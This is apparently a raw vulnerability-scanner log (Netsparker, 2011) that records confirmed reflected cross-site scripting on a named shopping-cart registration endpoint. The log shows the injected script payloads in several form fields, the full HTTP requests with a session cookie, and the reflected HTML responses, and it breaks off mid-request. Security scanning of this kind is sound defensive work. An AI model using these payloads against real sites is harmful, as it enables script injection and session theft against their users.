<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country" selected>Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="'"--></style></script><script>netsparker(0x0001F2)</script>"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1">Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7" Selected></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST Other Country
txtZip POST 3
txtCountry POST 3
txtPhone POST '"--></style></script><script>alert(0x0001F3)</script>
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 370
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=Other+Country&txtZip=3&txtCountry=3&txtPhone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001F3)%3c%2fscript%3e&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com&cmbAdvert=7

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:43:06 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country" selected>Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="'"--></style></script><script>netsparker(0x0001F3)</script>"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1">Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7" Selected></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST Other Country
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST '"--></style></script><script>alert(0x0001F4)</script>
txtFax POST 3
txtEmail POST netsparker@example.com
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 370
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=Other+Country&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001F4)%3c%2fscript%3e&txtFax=3&txtEmail=netsparker%40example.com&cmbAdvert=7

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:43:09 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country" selected>Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="'"--></style></script><script>netsparker(0x0001F4)</script>"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1">Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7" Selected></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST Other Country
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST '"--></style></script><script>alert(0x0001F5)</script>
txtEmail POST netsparker@example.com
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
